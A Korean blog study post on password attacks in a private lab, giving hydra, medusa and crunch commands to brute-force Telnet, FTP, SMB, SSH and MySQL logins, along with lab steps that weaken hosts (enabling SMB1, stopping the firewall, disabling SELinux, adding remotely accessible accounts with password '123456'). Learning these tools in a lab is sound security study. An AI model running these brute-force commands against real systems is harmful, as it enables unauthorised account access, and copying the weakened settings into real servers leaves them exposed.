안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 hydra, medusa, crunch (패스워드 공격)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.187.100

Linux IP : 192.168.187.101

Windows IP : 192.168.187.102

 

패스워드 공격(Password Attack)

- 무차별 대입 공격(Brute Force Attack)

- 사전 공격(Dictionary Attack)

- 추측 공격(Guessing Attack)

 

(패스워드)

숫자 : 10자(0~9)

알파벳(소문자) : 26자

알파벳(대문자) : 26자

특수문자 : 32자

 

무차별 대입 공격(Brute Force Attack)

# hydra [옵션] [설정값] [공격 대상 IP주소/도메인]

 

(옵션)

-l : 계정 지정

-L : 계정 목록(사전 파일)

-p : 패스워드 지정

-P : 패스워드 목록(사전 파일)

-V : 패스워드 대입 과정 출력

-f : 패스워드 찾을 시 중지

-s : 포트 지정(포트 변경시)

-x [MIN]:[MAX]:[charset] : 지정 범위, 문자열 패스워드 무작위 생성

-M : IP주소(공격 대상) 지정(사전 파일)

-o : 찾은 패스워드 내용을 파일로 저장

 

(Linux 공격)

1. Telnet 이용(Kali)

# hydra -l test -p 123456 telnet://192.168.187.101

 

 

 

2. FTP 이용(Kali)

# hydra -l test -p 123456 ftp://192.168.187.101 -V -f

 

 

 

3. 패스워드 사전 파일 이용(Kali)

# vi pass.txt

 

 

 

# hydra -l test -P /root/pass.txt ftp://192.168.187.101 -V -f

 

 

 

4. 계정 사전 파일 이용(Kali)

# vi id.txt

 

 

 

# hydra -L /root/id.txt -P /root/pass.txt ftp://192.168.187.101 -V -f

 

 

 

5. 포트 변경시 패스워드 공격

(1) 포트 변경(Linux)

# cd /etc/vsftpd

# vi vsftpd.conf

 

 

 

(2) ftp 재시작(Linux)

# systemctl restart vsftpd

 

 

(3) 확인(Kali)

# hydra -l test -p 123456 -s 2121 ftp://192.168.187.101 -V -f

 

 

 

6. 공격 대상 지정(Kali)

# vi target.txt

 

 

 

# hydra –L /root/id.txt -P /root/pass.txt -M target.txt ftp –V -f

 

 

 

7. 찾은 결과만 파일로 저장(Kali)

# hydra -L /root/id.txt -P /root/pass.txt ftp://192.168.187.101 –V -f –o result.txt

 

 

 

(Windows 공격)

1. 윈도우 계정 생성(관리자 권한) (Windows)

> net user root 123456 /add

 

 

2. 윈도우 취약점 생성(Windows)

앱 및 기능 -> 프로그램 및 기능 -> windows 기능 켜기/끄기 -> SMB1.0 체크

 

 

3. 윈도우 패스워드 공격(Kali)

# hydra -l root -p 123456 smb://192.168.187.102 -V -f

 

 

 

4. 패스워드 무작위 공격(숫자만)(Kali)

# hydra -l root2 -x 3:3:1 smb://192.168.187.102 -V -f

 

 

 

5. 패스워드 무작위 공격(숫자+영어)(Kali)

# hydra -l root3 -x 3:3:1a smb://192.168.10.102 -V -f

 

 

 

(자료) 사전 파일 (압출 풀어서 사용) (Kali)

/usr/share/wordlists/rockyou.txt.gz

 

 

(Linux 공격)

1. 프로그램 설치(linux)

# yum -y install mariadb

 

2. 방화벽 해제(linux)

# systemctl stop firewalld

# setenforce 0

 

3. 재시작(linux)

# systemctl restart mariadb

 

4. 접속(linux)

# mysql -p mysql

 

 

 

5. root 패스워드 설정(linux)

> update user set password=password('123456') where user='root';

> flush privileges;

 

 

6. 계정 생성/추가(linux)

(내부에서만 접근)
> insert into user(host,user,password) values('localhost','korea',password('123456'));


(외부에서의 접근, 모든 네트워크 허용, 내부 제외)
> insert into user(host,user,password) values('%','korea',password('123456'));


(192.168.10.100 호스트만 허용)
> insert into user(host,user,password) values('192.168.10.100','korea',password('123456'));


(C 클래스만 허용)
> insert into user(host,user,password) values('192.168.10.%','korea',password('123456'));

 

 

외부에서 접근 허용이 되야하므로

> insert into user(host,user,password) values('%','korea',password('123456'));

> flush privileges;

 

 

11. 재시작(linux)

# systemctl restart mariadb

 

12. 확인(kali)

# hydra -l korea -p 123456 mysql://192.168.10.101 -V -f

 

 

 

13. 기타(Linux)

> select host,user,password from user;

 

 

 

https://crackstation.net/ (간단한 암호는 풀 수 있음)

 

 

 

# medusa [옵션] [설정값] [공격 대상]

 

<옵션>

-u : 계정명

-U : 계정 목록(사전 파일)

-p : 패스워드

-P : 패스워드 목록(사전 파일)

-h : 공격 대상 호스트 지정

-M : 모듈 지정(프로토콜)

 

1. 패스워드 공격(Kali)

# medusa -u test -p 123456 -h 192.168.187.101 -M ssh

# medusa -u test -p 123456 -h 192.168.187.101 -M telnet

# medusa -u test -p 123456 -h 192.168.187.101 -M mysql

# medusa -u test -p 123456 -h 192.168.187.101 -M ftp

# medusa -u test -p 123456 -h 192.168.187.101 -M http

# medusa -u test -p 123456 -h 192.168.187.101 -M pop3

# medusa -u test -p 123456 -h 192.168.187.101 -M imap

 

 

 

# crunch [최소 자리수] [최대 자리수] [사용될 문자] -o [저장될 파일명]

- 사전 파일 생성

 

1. 4자리 숫자 사전파일 생성

# crunch 4 4 1234567890 -o /root/crunch.txt

 

 

 

2. 4자리 숫자+영어a 사전파일 생성

# crunch 4 4 1234567890a -o /root/crunch2.txt

 

 

 

3. 4자리 숫자 사전파일 생성 (12는 고정)

# crunch 4 4 1234567890 -t 12@@ -o /root/crunch3.txt

 

 

 

4. 4자리 숫자 사전파일 생성 (두번째 자리 2는 고정)

# crunch 4 4 1234567890 -t @2@@ -o /root/crunch4.txt

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 hydra, medusa, crunch (패스워드 공격)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

 

+ Recent posts